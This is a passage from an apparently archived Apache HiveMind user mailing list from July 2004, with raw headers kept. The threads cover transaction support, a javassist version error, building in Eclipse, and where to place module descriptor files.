size=3D2>Thanks,</FONT></SPAN></DIV> <DIV dir=3Dltr align=3Dleft><SPAN class=3D674100222-01072004><FONT = face=3DArial=20 color=3D#0000ff size=3D2></FONT></SPAN>&nbsp;</DIV> <DIV dir=3Dltr align=3Dleft><SPAN class=3D674100222-01072004><FONT = face=3DArial=20 color=3D#0000ff size=3D2>Drew</FONT></SPAN></DIV><BR> <DIV class=3DOutlookMessageHeader lang=3Den-us dir=3Dltr align=3Dleft> <HR tabIndex=3D-1> <FONT face=3DTahoma size=3D2><B>From:</B> Pablo Lalloni=20 [mailto:[email protected]] <BR><B>Sent:</B> Thursday, July 01, 2004 = 12:50=20 PM<BR><B>To:</B> [email protected]<BR><B>Subject:</B> Re: = Spring-like transaction features?<BR></FONT><BR></DIV> <DIV></DIV>We've written full support for Hibernate and JDBC as HiveMind = services, and I'm currently working on a TransactionInterceptor factory = service=20 to use declarative transaction demarcation a-la EJB. <BR><BR>To support=20 Hibernate we made an HibernateSessionService who's able to receive = contributions=20 of SessionFactory's configurations and also mappings (hbm's) for = persistent=20 classes. On startup this service builds up all the SessionFactory's as=20 determined by contributions associating to each the corresponding = persistent=20 classes. After this any dependant component can ask for a Session = corresponding=20 to a given class or query name. Sessions are associated to threads = through=20 ThreadStorageService so the same Session can be returned for the same = thread,=20 they're cleaned up con thread cleanup events.<BR><BR>Also did something = alike=20 for supporting a FastLaneReader through JDBC where we take a similar = approach=20 for Connection management.<BR><BR>In front of this services we have a=20 FinderService and a CRUDService which can be used for what their names = mean=20 despite whether the data is accessed through JDBC, Hibernate or any = future data=20 access backend implemented as a HiveMind service.<BR><BR>Transactions = are=20 handled with the above mentioned interceptor supporting EJB CMT=20 policies.<BR><BR>If anyone's interested in any of this, I guess I can = send out=20 more details and/or code (if my boss agree with it, of which I'm pretty=20 confident).<BR><BR>Cheers,<BR>PiL<BR><BR>El jue, 01-07-2004 a las 16:29, = Drew=20 McAuliffe escribi=F3:=20 <BLOCKQUOTE TYPE=3D"CITE"><FONT color=3D#0000ff size=3D2><I>Are there = any plans to=20 introduce features into HiveMind like Spring's abstraction of = transactionality=20 of Hibernate or other data access? I like the way that Spring can make = the=20 details of data access and transactionality configurable but I prefer = the way=20 HiveMind deals with the overall service abstraction, pluggability,=20 interception, etc. Is there any plan to introduce these higher-order = features=20 into HiveMind, or is it still concentrating mainly on the=20 IoC/container/pluggability side of things? Or does anyone out there = have a=20 HiveMind module that does a similar thing? I'm investigating moving a=20 combination of homegrown app layers to either one of these two big = guys, and I=20 don't like the idea of mixing them because of the functionality=20 overlap.</FONT><BR><FONT color=3D#737373>&nbsp;</FONT><BR><FONT = color=3D#0000ff=20 size=3D2>Thanks,<BR>Drew</I></FONT> </BLOCKQUOTE></BODY></HTML> ------=_NextPart_000_028E_01C45F7C.CFB14060-- From [email protected] Tue Jul 06 23:49:45 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 53401 invoked from network); 6 Jul 2004 23:49:45 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 6 Jul 2004 23:49:45 -0000 Received: (qmail 69724 invoked by uid 500); 6 Jul 2004 23:50:05 -0000 Delivered-To: [email protected] Received: (qmail 69661 invoked by uid 500); 6 Jul 2004 23:50:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 43699 invoked by uid 99); 6 Jul 2004 21:35:35 -0000 X-ASF-Spam-Status: No, hits=0.1 required=10.0 tests=DNS_FROM_RFC_ABUSE X-Spam-Check-By: apache.org Message-ID: <[email protected]> Date: Tue, 6 Jul 2004 14:34:50 -0700 (PDT) From: Erik Rasmussen <[email protected]> Subject: Can't get most simple example to work To: [email protected] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N First of all, I can't see anywhere to actually obtain the calculator example, so I've constructed what I think to be the simplest example based on what I understand from the online tutorials. I'm getting: Exception in thread "main" org.apache.hivemind.ApplicationRuntimeException: Unable to create class $SingletonProxy_fd964a7359_0: javassist.ClassPool.write(Ljava/lang/String;)[B at org.apache.hivemind.impl.servicemodel.SingletonServiceModel.createSingletonProxy(Unknown Source) at org.apache.hivemind.impl.servicemodel.SingletonServiceModel.getService(Unknown Source) at org.apache.hivemind.impl.ServicePointImpl.getService(Unknown Source) at org.apache.hivemind.impl.ServicePointImpl.getService(Unknown Source) at org.apache.hivemind.impl.RegistryImpl.getService(Unknown Source) at org.apache.hivemind.impl.RegistryImpl.startup(Unknown Source) at org.apache.hivemind.impl.RegistryBuilder.constructRegistry(Unknown Source) at org.apache.hivemind.impl.RegistryBuilder.constructDefaultRegistry(Unknown Source) The example I've created is here: http://www.erik-rasmussen.com/hivemind/simple-hivemind-example.tar.gz (602K) Either I'm missing something, or I'm not using compatible jars (maybe I need an older version of javassist.jar?). Thanks for any help you can provide, Erik __________________________________ Do you Yahoo!? New and Improved Yahoo! Mail - 100MB free storage! http://promotions.yahoo.com/new_mail --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jul 06 23:54:06 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54407 invoked from network); 6 Jul 2004 23:54:06 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 6 Jul 2004 23:54:06 -0000 Received: (qmail 74530 invoked by uid 500); 6 Jul 2004 23:54:27 -0000 Delivered-To: [email protected] Received: (qmail 74452 invoked by uid 500); 6 Jul 2004 23:54:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 74430 invoked by uid 99); 6 Jul 2004 23:54:25 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO bb0eb005.cdc.schwab.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Tue, 06 Jul 2004 16:54:24 -0700 Received: from s0743cdc.schwab.com (s0743cdc.schwab.com [161.129.204.104]) by bb0eb005.cdc.schwab.com (Switch-3.1.2/Switch-3.1.0) with ESMTP id i66Nrt9R018107 for <[email protected]>; Tue, 6 Jul 2004 19:53:55 -0400 Received: (from root@localhost) by sendmail.cf s0743cdc id i66NrtNT008002 for [email protected]; Tue, 6 Jul 2004 19:53:55 -0400 Received: ( Schwab Email ) by copymail.cf s0743cdc with SMTP id i66Nrsd1007975; for <[email protected]>; Tue, 6 Jul 2004 19:53:54 -0400 Received: From n2121pmx.nt.schwab.com ([161.129.204.104]) by n1110smx.nt.schwab.com (WebShield SMTP v4.5 MR1a P0803.345); id 1089158024876; Tue, 6 Jul 2004 16:53:44 -0700 Received: by N2121PMX with Internet Mail Service (5.5.2657.72) id <JM86KYDS>; Tue, 6 Jul 2004 16:53:24 -0700 Message-ID: <[email protected]> From: "Sikha, Naresh" <[email protected]> To: "'[email protected]'" <[email protected]> Subject: RE: Can't get most simple example to work Date: Tue, 6 Jul 2004 16:53:45 -0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2657.72) Content-Type: text/plain X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Erik, I believe the error belies the real problem - an incomplete dependency class path. Grab the latest Jakarta Commons Lang and Jakarta ORO packages, place them in you lib directory and rerun. Things should work. Cheers. Naresh Sikha -----Original Message----- From: Erik Rasmussen [mailto:[email protected]] Sent: Tuesday, July 06, 2004 2:35 PM To: [email protected] Subject: Can't get most simple example to work First of all, I can't see anywhere to actually obtain the calculator example, so I've constructed what I think to be the simplest example based on what I understand from the online tutorials. I'm getting: Exception in thread "main" org.apache.hivemind.ApplicationRuntimeException: Unable to create class $SingletonProxy_fd964a7359_0: javassist.ClassPool.write(Ljava/lang/String;)[B at org.apache.hivemind.impl.servicemodel.SingletonServiceModel.createSingletonP roxy(Unknown Source) at org.apache.hivemind.impl.servicemodel.SingletonServiceModel.getService(Unkno wn Source) at org.apache.hivemind.impl.ServicePointImpl.getService(Unknown Source) at org.apache.hivemind.impl.ServicePointImpl.getService(Unknown Source) at org.apache.hivemind.impl.RegistryImpl.getService(Unknown Source) at org.apache.hivemind.impl.RegistryImpl.startup(Unknown Source) at org.apache.hivemind.impl.RegistryBuilder.constructRegistry(Unknown Source) at org.apache.hivemind.impl.RegistryBuilder.constructDefaultRegistry(Unknown Source) The example I've created is here: http://www.erik-rasmussen.com/hivemind/simple-hivemind-example.tar.gz (602K) Either I'm missing something, or I'm not using compatible jars (maybe I need an older version of javassist.jar?). Thanks for any help you can provide, Erik __________________________________ Do you Yahoo!? New and Improved Yahoo! Mail - 100MB free storage! http://promotions.yahoo.com/new_mail --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jul 06 23:54:20 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54502 invoked from network); 6 Jul 2004 23:54:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 6 Jul 2004 23:54:20 -0000 Received: (qmail 74958 invoked by uid 500); 6 Jul 2004 23:54:40 -0000 Delivered-To: [email protected] Received: (qmail 74946 invoked by uid 500); 6 Jul 2004 23:54:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 74932 invoked by uid 99); 6 Jul 2004 23:54:40 -0000 X-ASF-Spam-Status: No, hits=1.3 required=10.0 tests=RCVD_BY_IP,SB_NEW_BULK,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO mproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Tue, 06 Jul 2004 16:54:38 -0700 Received: by mproxy.gmail.com with SMTP id x43so241237cwb for <[email protected]>; Tue, 06 Jul 2004 16:54:05 -0700 (PDT) Received: by 161.129.204.104 with SMTP id u7mr500331cwc; Tue, 06 Jul 2004 16:53:55 -0700 (PDT) Message-ID: <[email protected]> Date: Tue, 6 Jul 2004 19:53:55 -0400 From: Howard Lewis Ship <[email protected]> To: [email protected] Subject: Re: Can't get most simple example to work In-Reply-To: <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit References: <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N It looks like it should work; perhaps there's an issue because you are using the default package? I would suggest moving your Java files into a package and see if that makes a difference. On Tue, 6 Jul 2004 14:34:50 -0700 (PDT), Erik Rasmussen <[email protected]> wrote: > First of all, I can't see anywhere to actually obtain > the calculator example, so I've constructed what I > think to be the simplest example based on what I > understand from the online tutorials. > > I'm getting: > > Exception in thread "main" > org.apache.hivemind.ApplicationRuntimeException: > Unable to create class $SingletonProxy_fd964a7359_0: > javassist.ClassPool.write(Ljava/lang/String;)[B > at > org.apache.hivemind.impl.servicemodel.SingletonServiceModel.createSingletonProxy(Unknown > Source) > at > org.apache.hivemind.impl.servicemodel.SingletonServiceModel.getService(Unknown > Source) > at > org.apache.hivemind.impl.ServicePointImpl.getService(Unknown > Source) > at > org.apache.hivemind.impl.ServicePointImpl.getService(Unknown > Source) > at > org.apache.hivemind.impl.RegistryImpl.getService(Unknown > Source) > at > org.apache.hivemind.impl.RegistryImpl.startup(Unknown > Source) > at > org.apache.hivemind.impl.RegistryBuilder.constructRegistry(Unknown > Source) > at > org.apache.hivemind.impl.RegistryBuilder.constructDefaultRegistry(Unknown > Source) > > The example I've created is here: > http://www.erik-rasmussen.com/hivemind/simple-hivemind-example.tar.gz > (602K) > > Either I'm missing something, or I'm not using > compatible jars (maybe I need an older version of > javassist.jar?). > > Thanks for any help you can provide, > Erik > > __________________________________ > Do you Yahoo!? > New and Improved Yahoo! Mail - 100MB free storage! > http://promotions.yahoo.com/new_mail > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > > -- Howard M. Lewis Ship Independent J2EE / Open-Source Java Consultant Creator, Jakarta Tapestry Creator, Jakarta HiveMind http://howardlewisship.com --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Jul 07 00:25:10 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 62201 invoked from network); 7 Jul 2004 00:25:10 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 7 Jul 2004 00:25:10 -0000 Received: (qmail 24292 invoked by uid 500); 7 Jul 2004 00:25:30 -0000 Delivered-To: [email protected] Received: (qmail 24228 invoked by uid 500); 7 Jul 2004 00:25:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 24214 invoked by uid 99); 7 Jul 2004 00:25:30 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO bb0eb005.cdc.schwab.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Tue, 06 Jul 2004 17:25:28 -0700 Received: from s0743cdc.schwab.com (s0743cdc.schwab.com [161.129.204.104]) by bb0eb005.cdc.schwab.com (Switch-3.1.2/Switch-3.1.0) with ESMTP id i670Ox9R028486 for <[email protected]>; Tue, 6 Jul 2004 20:24:59 -0400 Received: (from root@localhost) by sendmail.cf s0743cdc id i670OuSB026528 for [email protected]; Tue, 6 Jul 2004 20:24:57 -0400 Received: ( Schwab Email ) by copymail.cf s0743cdc with SMTP id i670Osd1026437; for <[email protected]>; Tue, 6 Jul 2004 20:24:54 -0400 Received: From n1121smx.nt.schwab.com ([161.129.204.104]) by n1110smx.nt.schwab.com (WebShield SMTP v4.5 MR1a P0803.345); id 1089159884829; Tue, 6 Jul 2004 17:24:44 -0700 Received: by n1121smx.nt.schwab.com with Internet Mail Service (5.5.2657.72) id <LGX4BNA5>; Tue, 6 Jul 2004 17:24:53 -0700 Message-ID: <[email protected]> From: "Sikha, Naresh" <[email protected]> To: "'[email protected]'" <[email protected]> Subject: RE: Can't get most simple example to work Date: Tue, 6 Jul 2004 17:24:45 -0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2657.72) Content-Type: text/plain X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Erik, Your suspicions were correct. I was able to make your example run with javassist 2.6. My comment below did not make a difference. Thanks. Naresh Sikha -----Original Message----- From: Sikha, Naresh Sent: Tuesday, July 06, 2004 4:54 PM To: '[email protected]' Subject: RE: Can't get most simple example to work Erik, I believe the error belies the real problem - an incomplete dependency class path. Grab the latest Jakarta Commons Lang and Jakarta ORO packages, place them in you lib directory and rerun. Things should work. Cheers. Naresh Sikha -----Original Message----- From: Erik Rasmussen [mailto:[email protected]] Sent: Tuesday, July 06, 2004 2:35 PM To: [email protected] Subject: Can't get most simple example to work First of all, I can't see anywhere to actually obtain the calculator example, so I've constructed what I think to be the simplest example based on what I understand from the online tutorials. I'm getting: Exception in thread "main" org.apache.hivemind.ApplicationRuntimeException: Unable to create class $SingletonProxy_fd964a7359_0: javassist.ClassPool.write(Ljava/lang/String;)[B at org.apache.hivemind.impl.servicemodel.SingletonServiceModel.createSingletonP roxy(Unknown Source) at org.apache.hivemind.impl.servicemodel.SingletonServiceModel.getService(Unkno wn Source) at org.apache.hivemind.impl.ServicePointImpl.getService(Unknown Source) at org.apache.hivemind.impl.ServicePointImpl.getService(Unknown Source) at org.apache.hivemind.impl.RegistryImpl.getService(Unknown Source) at org.apache.hivemind.impl.RegistryImpl.startup(Unknown Source) at org.apache.hivemind.impl.RegistryBuilder.constructRegistry(Unknown Source) at org.apache.hivemind.impl.RegistryBuilder.constructDefaultRegistry(Unknown Source) The example I've created is here: http://www.erik-rasmussen.com/hivemind/simple-hivemind-example.tar.gz (602K) Either I'm missing something, or I'm not using compatible jars (maybe I need an older version of javassist.jar?). Thanks for any help you can provide, Erik __________________________________ Do you Yahoo!? New and Improved Yahoo! Mail - 100MB free storage! http://promotions.yahoo.com/new_mail --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Jul 09 18:19:14 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 15826 invoked from network); 9 Jul 2004 18:19:13 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 9 Jul 2004 18:19:13 -0000 Received: (qmail 2178 invoked by uid 500); 9 Jul 2004 18:19:14 -0000 Delivered-To: [email protected] Received: (qmail 2109 invoked by uid 500); 9 Jul 2004 18:19:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 2094 invoked by uid 99); 9 Jul 2004 18:19:13 -0000 X-ASF-Spam-Status: No, hits=1.3 required=10.0 tests=RCVD_BY_IP,SB_NEW_BULK,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO mproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Fri, 09 Jul 2004 11:19:08 -0700 Received: by mproxy.gmail.com with SMTP id u22so107929cwc for <[email protected]>; Fri, 09 Jul 2004 11:18:54 -0700 (PDT) Received: by 161.129.204.104 with SMTP id v59mr49771cwb; Fri, 09 Jul 2004 11:18:54 -0700 (PDT) Message-ID: <[email protected]> Date: Fri, 9 Jul 2004 14:18:54 -0400 From: Howard Lewis Ship <[email protected]> To: [email protected] Subject: HiveMind 1.0-beta-1 in Maven / ibilbio Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N I've managed to get the HiveMind 1.0-beta-1 JAR files copied into Maven's ibiblio archive. Maven users can now easily make use of HiveMind. Please report any problems (I'm not a Maven user). -- Howard M. Lewis Ship Independent J2EE / Open-Source Java Consultant Creator, Jakarta Tapestry Creator, Jakarta HiveMind http://howardlewisship.com --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Jul 09 20:59:59 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 15169 invoked from network); 9 Jul 2004 20:59:58 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 9 Jul 2004 20:59:58 -0000 Received: (qmail 57578 invoked by uid 500); 9 Jul 2004 20:59:59 -0000 Delivered-To: [email protected] Received: (qmail 57503 invoked by uid 500); 9 Jul 2004 20:59:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 57488 invoked by uid 99); 9 Jul 2004 20:59:58 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FORGED_RCVD_HELO X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO mail1.mckhboc.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Fri, 09 Jul 2004 13:59:54 -0700 Received: from 161.129.204.104 by mail1.mckhboc.com with ESMTP (Outbound Mail1 SMTP Relay (MMS v5.6.1)); Fri, 09 Jul 2004 11:33:10 -0700 X-Server-Uuid: E618535E-AE39-475D-9091-BC1AF22CB2F2 Received: by smtpout.hboc.com with Internet Mail Service (5.5.2653.19) id <N5TGWAHX>; Fri, 9 Jul 2004 14:32:29 -0400 Received: from atlexc91nthub.hboc.com (ims2.mckesson.com [161.129.204.104] ) by atlexcsmtpb.hboc.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id N5TGWAHV; Fri, 9 Jul 2004 14:32:27 -0400 Received: by ims2.mckesson.com with Internet Mail Service (5.5.2653.19) id <31MN7C2C>; Fri, 9 Jul 2004 14:33:14 -0400 From: "Hensley, Richard" <[email protected]> To: "'[email protected]'" <[email protected]> Message-ID: <[email protected]> Subject: Building in Eclipse Date: Fri, 9 Jul 2004 14:31:45 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) X-WSS-ID: 6CF03B3E19W521685-01-01 Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N I like working in eclipse, so I've been working towards getting hivemind to compile in eclipse. I added all the libraries documented in to the build path for eclipse, and then I found a few more. org.apache.hivemind.ant ant xerces org.apache.hiveminde.servlet servlet org.apache.hivemind.text log4j Does all this sound right? The only one that struck me as unusual is the log4j because the rest of the code used commons-logging. After I ran the standard build once to get the JavaCC generated files, and resolved the dependencies everything worked out. Just thought I would let others know. Richard --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Jul 10 03:01:54 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51128 invoked from network); 10 Jul 2004 03:01:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 10 Jul 2004 03:01:54 -0000 Received: (qmail 30032 invoked by uid 500); 10 Jul 2004 03:01:53 -0000 Delivered-To: [email protected] Received: (qmail 29968 invoked by uid 500); 10 Jul 2004 03:01:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 29941 invoked by uid 99); 10 Jul 2004 03:01:53 -0000 X-ASF-Spam-Status: No, hits=1.3 required=10.0 tests=RCVD_BY_IP,SB_NEW_BULK,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO mproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Fri, 09 Jul 2004 20:01:50 -0700 Received: by mproxy.gmail.com with SMTP id x43so338347cwb for <[email protected]>; Fri, 09 Jul 2004 20:01:48 -0700 (PDT) Received: by 161.129.204.104 with SMTP id x53mr5043cwb; Fri, 09 Jul 2004 20:01:47 -0700 (PDT) Message-ID: <[email protected]> Date: Fri, 9 Jul 2004 23:01:47 -0400 From: Howard Lewis Ship <[email protected]> To: [email protected], [email protected] Subject: Updated Jakarta Site mailing lists page Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N For what it's worth (i.e., if you're reading this, you've figured it out), I've updated the mailing list page (http://jakarta.apache.org/site/mail2.html#HiveMind) to identify HiveMInd's list and how to subscribe and unsubscribe. At some point soon, I'll update the HiveMind home page to point to this page. -- Howard M. Lewis Ship Independent J2EE / Open-Source Java Consultant Creator, Jakarta Tapestry Creator, Jakarta HiveMind http://howardlewisship.com --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Jul 10 03:04:12 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51454 invoked from network); 10 Jul 2004 03:04:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 10 Jul 2004 03:04:12 -0000 Received: (qmail 31295 invoked by uid 500); 10 Jul 2004 03:04:11 -0000 Delivered-To: [email protected] Received: (qmail 31275 invoked by uid 500); 10 Jul 2004 03:04:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 31260 invoked by uid 99); 10 Jul 2004 03:04:11 -0000 X-ASF-Spam-Status: No, hits=1.3 required=10.0 tests=RCVD_BY_IP,SB_NEW_BULK,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO mproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Fri, 09 Jul 2004 20:04:08 -0700 Received: by mproxy.gmail.com with SMTP id x17so82754cwb for <[email protected]>; Fri, 09 Jul 2004 20:04:07 -0700 (PDT) Received: by 161.129.204.104 with SMTP id v29mr5004cwb; Fri, 09 Jul 2004 20:04:07 -0700 (PDT) Message-ID: <[email protected]> Date: Fri, 9 Jul 2004 23:04:07 -0400 From: Howard Lewis Ship <[email protected]> To: [email protected] Subject: Re: Building in Eclipse In-Reply-To: <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit References: <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N The Log4J dependency is related to controlling logging during execution of tests. Many of the tests introduce a special Log4J appender to capture output for analysis as part of the test ... functionality explicitly beyond the scope of the commons-logging apis. On Fri, 9 Jul 2004 14:31:45 -0400, Hensley, Richard <[email protected]> wrote: > I like working in eclipse, so I've been working towards getting hivemind to > compile in eclipse. > > I added all the libraries documented in to the build path for eclipse, and > then I found a few more. > > org.apache.hivemind.ant > ant > xerces > > org.apache.hiveminde.servlet > servlet > > org.apache.hivemind.text > log4j > > Does all this sound right? > > The only one that struck me as unusual is the log4j because the rest of the > code used commons-logging. > > After I ran the standard build once to get the JavaCC generated files, and > resolved the dependencies everything worked out. > > Just thought I would let others know. > > Richard > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > > -- Howard M. Lewis Ship Independent J2EE / Open-Source Java Consultant Creator, Jakarta Tapestry Creator, Jakarta HiveMind http://howardlewisship.com --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Jul 10 09:01:40 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 59499 invoked from network); 10 Jul 2004 09:01:40 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 10 Jul 2004 09:01:40 -0000 Received: (qmail 5182 invoked by uid 500); 10 Jul 2004 09:01:40 -0000 Delivered-To: [email protected] Received: (qmail 5114 invoked by uid 500); 10 Jul 2004 09:01:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 5101 invoked by uid 99); 10 Jul 2004 09:01:40 -0000 X-ASF-Spam-Status: No, hits=0.1 required=10.0 tests=DNS_FROM_RFC_ABUSE X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO web41004.mail.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Sat, 10 Jul 2004 02:01:37 -0700 Message-ID: <[email protected]> Received: from [161.129.204.104] by web41004.mail.yahoo.com via HTTP; Sat, 10 Jul 2004 02:01:36 PDT Date: Sat, 10 Jul 2004 02:01:36 -0700 (PDT) From: Erik Rasmussen <[email protected]> Subject: Design question To: [email protected] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N First of all, thank you to those who helped me with my previous question. I've tried posting a few thank yous already, but they've been rejected. My design question is, where should I keep my hivemodule.sdl files? Let's say I've got some classes that look like: com.mycorp.security.service.SecurityService com.mycorp.security.service.SecurityServiceImpl com.mycorp.security.data.UserData com.mycorp.security.data.GroupData com.mycorp.security.data.db.UserDataImpl com.mycorp.security.data.db.GroupDataImpl com.mycorp.security.data.ldap.UserDataImpl com.mycorp.security.data.ldap.GroupDataImpl So I've got the business logic in SecurityServiceImpl and it requires instances of UserData and GroupData to run. Initially, I thought I should put the hivemodule.sdl in: /com/mycorp/security/hivemodule.sdl To keep it, well, "modularized". Once I had my security.jar, I could plug that functionality into any application. But the whole point of this facade/service pattern is that I can swap out a different implementation of UserData and GroupData and SecurityService wouldn't need to know. But in order to do that "swap", I have to change hivemodule.sdl! Please don't tell me I have to have one hivemodule.sdl per application... :-( What's the best/recommended solution to this? Where should the hivemodule.sdl files live? Thanks, Erik __________________________________ Do you Yahoo!? New and Improved Yahoo! Mail - 100MB free storage! http://promotions.yahoo.com/new_mail --------------------------------------------------------------------- To 